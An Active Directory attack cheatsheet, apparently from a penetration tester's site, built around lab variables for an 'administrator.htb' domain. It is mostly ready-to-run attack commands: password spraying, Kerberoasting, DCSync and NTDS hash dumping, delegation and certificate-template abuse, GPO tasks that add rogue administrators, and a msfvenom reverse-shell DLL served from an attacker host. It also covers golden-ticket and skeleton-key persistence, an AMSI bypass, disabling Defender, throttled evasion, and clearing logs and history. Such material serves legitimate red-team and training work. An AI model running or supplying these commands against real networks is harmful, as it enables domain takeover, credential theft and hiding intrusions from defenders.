Active Directory Attack Paths Cheatsheet¶
Initial Enumeration¶
Network Scanning¶
# Quick SYN scan
sudo nmap -sS -p- --min-rate 10000 -Pn -n $TARGET -oN all_syn.txt
# Extract open ports and detailed scan
PORTS=$(grep "open" all_syn.txt | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/,$//');
sudo nmap -sVC -p $PORTS -Pn -n $TARGET -oN vuln_scan.txt
# UDP scan for DNS/LDAP
sudo nmap -sU -p 53,88,123,137,138,161,389,500,623 -Pn -n $TARGET
Domain Enumeration (Unauthenticated)¶
# Get domain info via LDAP
ldapsearch -x -H ldap://$DC_IP -s base namingcontexts
# DNS enumeration
dnsrecon -d $DOMAIN -n $DC_IP -t std,srv,axfr
dnsenum --dnsserver $DC_IP --enum -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt $DOMAIN
# RPC enumeration
rpcclient -U "" -N $DC_IP -c "enumdomusers"
enum4linux -a $DC_IP
Attack Path 1: Password Spray → BloodHound → Privilege Escalation¶
Step 1: User Enumeration¶
# Via Kerbrute
kerbrute userenum --dc $DC_IP -d $DOMAIN /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
# Via RID cycling
impacket-lookupsid $DOMAIN/guest@$DC_IP -no-pass | grep "SidTypeUser"
# Create user list
cat users.txt | awk -F'\' '{print $2}' | awk '{print $1}' > domain_users.txt
Step 2: Password Spray¶
# Using NetExec (formerly CrackMapExec)
netexec smb $DC_IP -u domain_users.txt -p 'Password123!' --continue-on-success
# Using Kerbrute
kerbrute passwordspray --dc $DC_IP -d $DOMAIN domain_users.txt 'Summer2024!'
# Using Spray-AD
spray-ad -U domain_users.txt -P passwords.txt -d $DOMAIN -dc $DC_IP
Step 3: BloodHound Collection¶
# Python collector
bloodhound-python -u 'olivia' -p 'ichliebedich' -d $DOMAIN -dc $DC_IP -c all --zip
# SharpHound via Evil-WinRM
evil-winrm -i $DC_IP -u 'olivia' -p 'ichliebedich'
*Evil-WinRM* PS > upload SharpHound.exe
*Evil-WinRM* PS > .\SharpHound.exe -c All -d $DOMAIN --zipfilename loot.zip
*Evil-WinRM* PS > download loot.zip
Step 4: BloodHound Analysis¶
# Find owned users
MATCH (u:User) WHERE u.user_tags CONTAINS 'owned' RETURN u
# Shortest path to Domain Admin
MATCH p=shortestPath((u:User {name:"OLIVIA@DOMAIN.LOCAL"})-[*1..]->(g:Group {name:"DOMAIN ADMINS@DOMAIN.LOCAL"})) RETURN p
# Find Kerberoastable users
MATCH (u:User) WHERE u.hasspn=true RETURN u
# Find AS-REP roastable users
MATCH (u:User) WHERE u.dontreqpreauth=true RETURN u
# Find computers with unconstrained delegation
MATCH (c:Computer) WHERE c.unconstraineddelegation=true RETURN c
Attack Path 2: ForceChangePassword → Shadow Credentials → DCSync¶
Step 1: Identify ForceChangePassword Rights¶
# Using BloodHound
MATCH p=(u:User {name:"OLIVIA@DOMAIN.LOCAL"})-[:ForceChangePassword]->(v) RETURN p
# Using bloodyAD
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' get writable --detail
Step 2: Change Target Password¶
# Using bloodyAD
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' set password 'michael' 'Passw0rd123!'
# Using rpcclient
rpcclient -U 'DOMAIN\olivia%ichliebedich' $DC_IP -c "setuserinfo2 michael 23 'Passw0rd123!'"
# Using PowerView (if on Windows)
Set-DomainUserPassword -Identity michael -Password (ConvertTo-SecureString 'Passw0rd123!' -AsPlainText -Force) -Credential $cred
Step 3: Add Shadow Credentials¶
# Generate certificate and add shadow creds
certipy shadow auto -u 'michael'@$DOMAIN -p 'Passw0rd123!' -account 'ethan' -dc-ip $DC_IP
# Using bloodyAD
bloodyAD --host $DC_IP -d $DOMAIN -u 'michael' -p 'Passw0rd123!' add shadowCredentials 'ethan'
# Authenticate with the certificate
python3 PKINITtools/gettgtpkinit.py -cert-pem cert.pem -key-pem key.pem $DOMAIN/ethan ethan.ccache
export KRB5CCNAME=ethan.ccache
# Get NTLM hash
python3 PKINITtools/getnthash.py -key key.pem -cert cert.pem -dc-ip $DC_IP $DOMAIN/ethan
Step 4: DCSync (if user has replication rights)¶
# Using secretsdump
impacket-secretsdump $DOMAIN/'ethan':'password'@$DC_IP
# Using mimikatz (on Windows)
lsadump::dcsync /domain:$DOMAIN /all /csv
lsadump::dcsync /domain:$DOMAIN /user:Administrator
# Using NetExec
netexec smb $DC_IP -u 'ethan' -p 'password' -M ntdsutil
Attack Path 3: GenericWrite → RBCD → Computer Account Takeover¶
Step 1: Add Computer Account¶
# Using impacket
impacket-addcomputer $DOMAIN/'olivia':'ichliebedich' -computer-name 'ATTACKER$' -computer-pass 'AttackerPass123!'
# Using bloodyAD
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' add computer 'ATTACKER$' 'AttackerPass123!'
# Using PowerMad (on Windows)
New-MachineAccount -MachineAccount "ATTACKER" -Password $(ConvertTo-SecureString 'AttackerPass123!' -AsPlainText -Force)
Step 2: Configure RBCD¶
# Add RBCD rights
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' add rbcd 'TARGET$' 'ATTACKER$'
# Using rbcd.py
rbcd.py -d $DOMAIN -u 'olivia' -p 'ichliebedich' -dc-ip $DC_IP -t 'TARGET$' -f 'ATTACKER$' -a write
Step 3: Get Service Ticket¶
# Request service ticket
impacket-getST -spn 'cifs/target.domain.local' -impersonate 'Administrator' $DOMAIN/'ATTACKER$':'AttackerPass123!' -dc-ip $DC_IP
# Export and use ticket
export KRB5CCNAME=Administrator.ccache
impacket-wmiexec -k -no-pass $DOMAIN/Administrator@target.domain.local
Attack Path 4: Kerberoasting → Crack → Lateral Movement¶
Step 1: Find Kerberoastable Users¶
# Using GetUserSPNs
impacket-GetUserSPNs $DOMAIN/'olivia':'ichliebedich' -dc-ip $DC_IP -request -outputfile kerberoast.hash
# Using bloodyAD
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' get search --filter "(&(objectClass=user)(servicePrincipalName=*))"
# Using Rubeus (on Windows)
Rubeus.exe kerberoast /outfile:kerberoast.hash
Step 2: Targeted Kerberoasting (if you have GenericWrite)¶
# Add SPN to target user
bloodyAD --host $DC_IP -d $DOMAIN -u 'emily' -p 'password' add servicePrincipalName 'ethan' 'MSSQLSvc/fake.domain.local'
# Kerberoast the user
impacket-GetUserSPNs $DOMAIN/'emily':'password' -dc-ip $DC_IP -request-user 'ethan' -outputfile ethan.hash
# Using targetedKerberoast
targetedKerberoast.py -v -d $DOMAIN -u 'emily' -p 'password' -u 'ethan'
Step 3: Crack Hashes¶
# Using hashcat
hashcat -m 13100 kerberoast.hash /usr/share/wordlists/rockyou.txt --force
# Using john
john --wordlist=/usr/share/wordlists/rockyou.txt kerberoast.hash --format=krb5tgs
Step 4: Lateral Movement¶
# Test credentials
netexec smb $SUBNET -u 'ethan' -p 'limpbizkit' --continue-on-success
# WinRM access
evil-winrm -i $TARGET -u 'ethan' -p 'limpbizkit'
# PSExec
impacket-psexec $DOMAIN/'ethan':'limpbizkit'@$TARGET
# WMIExec (stealthier)
impacket-wmiexec $DOMAIN/'ethan':'limpbizkit'@$TARGET
Attack Path 5: AS-REP Roasting → AddMember → Group Privileges¶
Step 1: AS-REP Roasting¶
# Find AS-REP roastable users
impacket-GetNPUsers $DOMAIN/ -dc-ip $DC_IP -no-pass -usersfile domain_users.txt -format hashcat
# Using specific user
impacket-GetNPUsers $DOMAIN/'olivia':'ichliebedich' -dc-ip $DC_IP -request -format hashcat
# Using Rubeus (Windows)
Rubeus.exe asreproast /format:hashcat /outfile:asrep.hash
Step 2: Make User AS-REP Roastable (if you have write rights)¶
# Disable pre-auth
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' add uac 'target_user' -f DONT_REQ_PREAUTH
# Using PowerView
Set-DomainObject -Identity 'target_user' -XOR @{useraccountcontrol=4194304}
Step 3: Add User to Privileged Group¶
# Add to group
bloodyAD --host $DC_IP -d $DOMAIN -u 'michael' -p 'password' add groupMember 'Remote Desktop Users' 'olivia'
# Using net commands (from Windows)
net group "Domain Admins" olivia /add /domain
# Using PowerView
Add-DomainGroupMember -Identity 'Remote Desktop Users' -Members 'olivia'
Attack Path 6: WriteDACL → Grant DCSync → Dump Hashes¶
Step 1: Identify WriteDACL Rights¶
# BloodHound query
MATCH p=(u:User {name:"OLIVIA@DOMAIN.LOCAL"})-[:WriteDacl]->(g:Group) RETURN p
# Using bloodyAD
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' get writable
Step 2: Grant DCSync Rights¶
# Using bloodyAD
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' add dcsync 'olivia'
# Using dacledit.py
python3 dacledit.py -d $DOMAIN -u 'olivia' -p 'ichliebedich' -t 'CN=Domain,DC=domain,DC=local' -pr 'olivia' -ace 'DS-Replication-Get-Changes,DS-Replication-Get-Changes-All'
# Using PowerView (Windows)
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity olivia -Rights DCSync
Step 3: Perform DCSync¶
# Dump all hashes
impacket-secretsdump $DOMAIN/'olivia':'ichliebedich'@$DC_IP
# Dump specific user
impacket-secretsdump $DOMAIN/'olivia':'ichliebedich'@$DC_IP -just-dc-user Administrator
# Using mimikatz (Windows)
lsadump::dcsync /domain:$DOMAIN /user:Administrator
Attack Path 7: Constrained Delegation Abuse¶
Step 1: Find Delegation¶
# Find constrained delegation
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' get search --filter "(&(objectClass=user)(msDS-AllowedToDelegateTo=*))"
# BloodHound query
MATCH (u:User) WHERE u.allowedtodelegate IS NOT NULL RETURN u
# Using PowerView
Get-DomainUser -TrustedToAuth
Step 2: Request Service Ticket¶
# Get TGT for service account
impacket-getTGT $DOMAIN/'service_account':'password' -dc-ip $DC_IP
# Request service ticket with protocol transition
impacket-getST -spn 'cifs/target.domain.local' -impersonate 'Administrator' -k -no-pass $DOMAIN/'service_account' -dc-ip $DC_IP
# Using Rubeus (Windows)
Rubeus.exe s4u /user:service_account /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt
Step 3: Access Target¶
# Export ticket
export KRB5CCNAME=Administrator.ccache
# Access via SMB
impacket-smbclient -k -no-pass $DOMAIN/Administrator@target.domain.local
# Get shell
impacket-psexec -k -no-pass $DOMAIN/Administrator@target.domain.local
Attack Path 8: ADCS (Certificate Services) Abuse¶
Step 1: Enumerate Certificate Templates¶
# Using Certipy
certipy find -u 'olivia'@$DOMAIN -p 'ichliebedich' -dc-ip $DC_IP -vulnerable
# Using bloodyAD
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' get search --filter "(objectClass=pKICertificateTemplate)"
Step 2: ESC1 - Request Certificate for Another User¶
# Request certificate as another user
certipy req -u 'olivia'@$DOMAIN -p 'ichliebedich' -target $CA_SERVER -ca 'CA-NAME' -template 'VulnerableTemplate' -upn 'administrator@domain.local'
# Authenticate with certificate
certipy auth -pfx administrator.pfx -dc-ip $DC_IP
Step 3: ESC8 - Web Enrollment Relay Attack¶
# Setup relay
ntlmrelayx.py -t http://$CA_SERVER/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
# Coerce authentication
petitpotam.py -u 'olivia' -p 'ichliebedich' -d $DOMAIN $ATTACKER_IP $DC_IP
Attack Path 9: Machine Account Quota → Computer Account → RBCD¶
Step 1: Check Machine Account Quota¶
# Check current quota
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' get object 'DC=domain,DC=local' --attr ms-DS-MachineAccountQuota
# Using ldapsearch
ldapsearch -x -H ldap://$DC_IP -D "olivia@$DOMAIN" -w 'ichliebedich' -b "DC=domain,DC=local" "(objectClass=domain)" ms-DS-MachineAccountQuota
Step 2: Add Computer Account¶
# Add computer
impacket-addcomputer $DOMAIN/'olivia':'ichliebedich' -computer-name 'EVIL$' -computer-pass 'EvilPass123!'
# Clear SPNs (for renaming attack)
addspn.py --clear -t 'EVIL$' -u $DOMAIN/'olivia' -p 'ichliebedich' $DC_IP
# Rename computer (if you have rights)
rename-machine.py -current-name 'EVIL$' -new-name 'DC01$' -dc-ip $DC_IP $DOMAIN/'olivia':'ichliebedich'
Step 3: Configure and Abuse RBCD¶
# Add RBCD
rbcd.py -d $DOMAIN -u 'olivia' -p 'ichliebedich' -dc-ip $DC_IP -t 'TARGETCOMP$' -f 'EVIL$' -a write
# Get service ticket
impacket-getST -spn 'cifs/targetcomp.domain.local' -impersonate 'Administrator' $DOMAIN/'EVIL$':'EvilPass123!' -dc-ip $DC_IP
# Access target
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass Administrator@targetcomp.domain.local
Attack Path 10: LAPS Abuse → Local Admin → Token Impersonation¶
Step 1: Find LAPS Rights¶
# Find who can read LAPS
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' get search --filter "(&(objectClass=computer)(ms-Mcs-AdmPwd=*))"
# Using NetExec
netexec ldap $DC_IP -u 'olivia' -p 'ichliebedich' -M laps
Step 2: Read LAPS Password¶
# Using bloodyAD
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' get object 'COMPUTER01$' --attr ms-Mcs-AdmPwd
# Using NetExec
netexec smb $TARGET -u 'olivia' -p 'ichliebedich' --laps
# Using ldapsearch
ldapsearch -x -H ldap://$DC_IP -D "olivia@$DOMAIN" -w 'ichliebedich' -b "DC=domain,DC=local" "(name=COMPUTER01$)" ms-Mcs-AdmPwd
Step 3: Use Local Admin Access¶
# Access with local admin
impacket-psexec Administrator:'LAPS_PASSWORD'@$TARGET_IP
# Dump local hashes
impacket-secretsdump Administrator:'LAPS_PASSWORD'@$TARGET_IP -outputfile local_hashes
# Token impersonation (once on the box)
# Using incognito
load incognito
list_tokens -u
impersonate_token "DOMAIN\Administrator"
Attack Path 11: GPO Abuse → Deploy Malicious Policy¶
Step 1: Find GPO Rights¶
# BloodHound query
MATCH p=(u:User {name:"OLIVIA@DOMAIN.LOCAL"})-[:GenericWrite|WriteProperty|WriteDacl]->(g:GPO) RETURN p
# Using PowerView
Get-NetGPO | Get-ObjectAcl -ResolveGUIDs | Where-Object {$_.ActiveDirectoryRights -match "WriteProperty"}
Step 2: Create Malicious GPO¶
# Using SharpGPOAbuse (Windows)
SharpGPOAbuse.exe --AddComputerTask --TaskName "EvilTask" --Author "Microsoft" --Command "cmd.exe" --Arguments "/c net user attacker Passw0rd! /add && net localgroup administrators attacker /add" --GPOName "Vulnerable GPO"
# Using pygpoabuse
python3 pygpoabuse.py $DOMAIN/'olivia':'ichliebedich' -gpo-id {GPO_ID} -command 'net user attacker Passw0rd! /add'
Step 3: Force GPO Update¶
# Force update remotely
impacket-atexec $DOMAIN/'olivia':'ichliebedich'@$TARGET "gpupdate /force"
# Using scheduled task
impacket-schtasks $DOMAIN/'olivia':'ichliebedich'@$TARGET -c "gpupdate /force"
Attack Path 12: Unconstrained Delegation → Printer Bug → Admin Takeover¶
Step 1: Find Unconstrained Delegation¶
# Using bloodyAD
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' get search --filter "(&(objectClass=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))"
# BloodHound query
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
Step 2: Setup Monitoring¶
# Monitor for incoming tickets (on compromised unconstrained delegation host)
Rubeus.exe monitor /interval:5 /nowrap
# Using krbrelayx
krbrelayx.py -t ldap://$DC_IP
Step 3: Coerce Authentication¶
# SpoolSample (Printer Bug)
SpoolSample.exe $DC_HOSTNAME $UNCONSTRAINED_HOST
# PetitPotam
petitpotam.py -u 'olivia' -p 'ichliebedich' -d $DOMAIN $UNCONSTRAINED_HOST $DC_IP
# PrinterBug.py
python3 printerbug.py $DOMAIN/'olivia':'ichliebedich'@$DC_IP $UNCONSTRAINED_HOST
Step 4: Extract and Use Ticket¶
# Export captured ticket
Rubeus.exe ptt /ticket:BASE64_TICKET
# DCSync with captured DC ticket
mimikatz # lsadump::dcsync /domain:$DOMAIN /all
Attack Path 13: WriteOwner → Change ACLs → Full Control¶
Step 1: Identify WriteOwner Rights¶
# Using bloodyAD
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' get writable --detail | grep -i owner
# BloodHound query
MATCH p=(u:User {name:"OLIVIA@DOMAIN.LOCAL"})-[:WriteOwner]->(n) RETURN p
Step 2: Change Object Owner¶
# Using bloodyAD
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' set owner 'TargetGroup' 'olivia'
# Using PowerView
Set-DomainObjectOwner -Identity 'TargetGroup' -OwnerIdentity 'olivia'
Step 3: Grant Full Control¶
# Add GenericAll rights
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' add genericAll 'TargetGroup' 'olivia'
# Using PowerView
Add-DomainObjectAcl -TargetIdentity 'TargetGroup' -PrincipalIdentity 'olivia' -Rights All
Attack Path 14: DNS Admin Abuse → DLL Injection → System Access¶
Step 1: Add User to DNS Admins¶
# If you have rights to add
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' add groupMember 'DnsAdmins' 'olivia'
# Using net commands
net group "DnsAdmins" olivia /add /domain
Step 2: Configure Malicious DLL¶
# Generate reverse shell DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=443 -f dll > evil.dll
# Host DLL on SMB share
impacket-smbserver share . -smb2support
# Configure DNS to load DLL
dnscmd.exe $DC_HOSTNAME /config /serverlevelplugindll \\$ATTACKER_IP\share\evil.dll
Step 3: Restart DNS Service¶
# Stop/Start DNS service
sc.exe \\$DC_HOSTNAME stop dns
sc.exe \\$DC_HOSTNAME start dns
# Or using PowerShell
Restart-Service -Name DNS -Force -ComputerName $DC_HOSTNAME
Attack Path 15: SeBackupPrivilege Abuse → NTDS Extraction¶
Step 1: Check Privileges¶
# Check current privileges (from shell)
whoami /priv
# Using PowerShell
Get-Acl -Path "C:\Windows\NTDS" | fl
Step 2: Backup NTDS.dit¶
# Using diskshadow
echo "set context persistent nowriters" > shadow.txt
echo "add volume c: alias vss" >> shadow.txt
echo "create" >> shadow.txt
echo "expose %vss% z:" >> shadow.txt
diskshadow /s shadow.txt
# Copy NTDS files
robocopy /b z:\windows\ntds . ntds.dit
reg save HKLM\SYSTEM system.hive
# Using ntdsutil
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
Step 3: Extract Hashes¶
# Using secretsdump locally
impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL
# Using NTDSDumpEx
NTDSDumpEx -d ntds.dit -s system.hive -o domain_hashes.txt
Post-Exploitation Commands¶
Persistence¶
# Golden Ticket
impacket-ticketer -nthash $KRBTGT_HASH -domain-sid $DOMAIN_SID -domain $DOMAIN Administrator
# Silver Ticket
impacket-ticketer -nthash $SERVICE_HASH -domain-sid $DOMAIN_SID -domain $DOMAIN -spn cifs/target.domain.local Administrator
# Skeleton Key
mimikatz # privilege::debug
mimikatz # misc::skeleton
# DSRM Password
mimikatz # lsadump::setntlm /user:Administrator /ntlm:$NTLM_HASH
Credential Harvesting¶
# DPAPI Extraction
mimikatz # dpapi::masterkey /in:masterkey_file /sid:$USER_SID /password:$PASSWORD
# Credential Manager
mimikatz # vault::list
mimikatz # vault::cred
# Browser Passwords
SharpChrome.exe logins /unprotect
# WiFi Passwords
netsh wlan show profiles
netsh wlan show profile name="PROFILE_NAME" key=clear
Defense Evasion¶
# AMSI Bypass
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Disable Windows Defender
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
# Clear Event Logs
wevtutil cl Security
wevtutil cl System
wevtutil cl Application
Useful Tools Reference¶
Collection Tools¶
- BloodHound/SharpHound: AD relationship mapping
- ADExplorer: Live AD browsing
- PingCastle: AD security assessment
- Purple Knight: AD security scanner
Exploitation Tools¶
- Impacket Suite: Python AD attack tools
- Rubeus: Kerberos abuse toolkit
- Mimikatz: Credential extraction
- PowerSploit/PowerView: PowerShell post-exploitation
- Certipy: ADCS exploitation
- bloodyAD: AD privilege escalation toolkit
- NetExec: Network service exploitation
Credential Tools¶
- hashcat: Password cracking
- john: Password cracking
- Responder: LLMNR/NBT-NS poisoning
- mitm6: IPv6 DNS takeover
Lateral Movement¶
- evil-winrm: WinRM shell
- psexec/smbexec/wmiexec: Remote execution
- proxychains: Proxy tool
- chisel/ligolo: Tunneling tools
Quick Wins Checklist¶
- Anonymous/Guest Access
  netexec smb $DC_IP -u '' -p ''
  netexec smb $DC_IP -u 'guest' -p ''
  rpcclient -U "" -N $DC_IP
- Default Credentials
  netexec smb $DC_IP -u administrator -p 'admin'
  netexec smb $DC_IP -u users.txt -p passwords.txt
- AS-REP Roasting (No Auth)
  impacket-GetNPUsers $DOMAIN/ -dc-ip $DC_IP -no-pass -usersfile users.txt
- Password in Description
  ldapsearch -x -H ldap://$DC_IP -D "" -w "" -b "DC=domain,DC=local" "(&(objectClass=user)(description=*pass*))" description
  netexec ldap $DC_IP -u 'olivia' -p 'password' -M get-desc-users
- SMB Shares Enumeration
  smbclient -L //$DC_IP -N
  smbmap -H $DC_IP -u guest
  netexec smb $DC_IP -u 'olivia' -p 'password' --shares
- Kerberoasting (Quick)
  impacket-GetUserSPNs $DOMAIN/'olivia':'password' -dc-ip $DC_IP -request
- BloodHound Collection (Quick)
  bloodhound-python -u 'olivia' -p 'password' -d $DOMAIN -dc $DC_IP -c DCOnly
- Check for Print Spooler
  rpcdump.py $DC_IP | grep -i spooler
  ls -la \\\\$DC_IP\\pipe\\spoolss
Environment Variables Reference¶
# Common variables used throughout commands
export DOMAIN="administrator.htb"
export DC_IP="10.10.11.42"
export DC_HOSTNAME="DC01"
export TARGET="target.administrator.htb"
export SUBNET="10.10.11.0/24"
export ATTACKER_IP="10.10.14.5"
export CA_SERVER="ca.administrator.htb"
# Kerberos configuration
export KRB5CCNAME=ticket.ccache
# Proxy configuration for pivoting
export proxychains_conf="/etc/proxychains4.conf"
Common Troubleshooting¶
Clock Skew Issues¶
# Sync time with DC
sudo ntpdate $DC_IP
# Or
sudo timedatectl set-ntp off
sudo ntpdate -s $DC_IP
Kerberos Issues¶
# Add to /etc/krb5.conf
[libdefaults]
default_realm = DOMAIN.LOCAL
dns_lookup_realm = false
dns_lookup_kdc = false
ticket_lifetime = 24h
renew_lifetime = 7d
forwardable = true
rdns = false
[realms]
DOMAIN.LOCAL = {
kdc = dc.domain.local
admin_server = dc.domain.local
}
SMB Signing/Encryption¶
# Check SMB signing
netexec smb $DC_IP --gen-relay-list signing.txt
# For older systems
smbclient -L //$DC_IP -N --option='client min protocol=NT1'
LDAP Channel Binding¶
# Check if enforced
netexec ldap $DC_IP -u '' -p '' -M ldap-checker
# Use LDAPS if required
ldapsearch -H ldaps://$DC_IP:636 -x -s base -b "" "(objectclass=*)"
Detection Evasion Tips¶
- Timing and Throttling
  # Slow down password spraying
  for user in $(cat users.txt); do
    netexec smb $DC_IP -u $user -p 'Password123!' --continue-on-success
    sleep 300 # 5 minutes between attempts
  done
- Use Different Protocols
  # Rotate between SMB, LDAP, Kerberos
  kerbrute passwordspray --dc $DC_IP -d $DOMAIN users.txt 'Password1!'
  netexec ldap $DC_IP -u users.txt -p 'Password1!'
  netexec winrm $DC_IP -u users.txt -p 'Password1!'
- Obfuscate PowerShell
  # Base64 encode commands
  $command = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('Get-Domain'))
  powershell -EncodedCommand $command
- Living Off the Land
  # Use built-in Windows tools
  wmic /node:$TARGET process call create "cmd /c whoami > c:\temp\out.txt"
  schtasks /create /s $TARGET /tn "Updates" /tr "cmd /c whoami" /sc once /st 23:00
Forensics and Cleanup¶
Remove Artifacts¶
# Clear command history
history -c
cat /dev/null > ~/.bash_history
# Remove Kerberos tickets
kdestroy -A
rm -f *.ccache
# Clear Windows event logs
Get-EventLog -List | ForEach-Object {Clear-EventLog -LogName $_.Log}
# Remove created accounts
net user attacker /delete /domain
bloodyAD --host $DC_IP -d $DOMAIN -u 'admin' -p 'password' remove computer 'EVIL$'
Check for Detection¶
# Check security logs for your activity
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624,4625,4768,4769,4776}
# Check for honey tokens
Get-ADUser -Filter * -Properties Description | Where {$_.Description -like "*honey*"}
Notes¶
- OPSEC: Always check for honeypots, canary tokens, and monitoring before executing attacks
- Persistence: Establish multiple forms of persistence before conducting noisy operations
- Documentation: Keep detailed logs of all commands and results for reporting
- Legal: Only perform these attacks in authorized penetration tests or your own lab environment
- Updates: Tools and techniques evolve; always check for the latest versions and methods
Contact & Updates¶
For updates and more cheatsheets, visit: https://www.0xczr.com/tools/
Last Updated: August 2025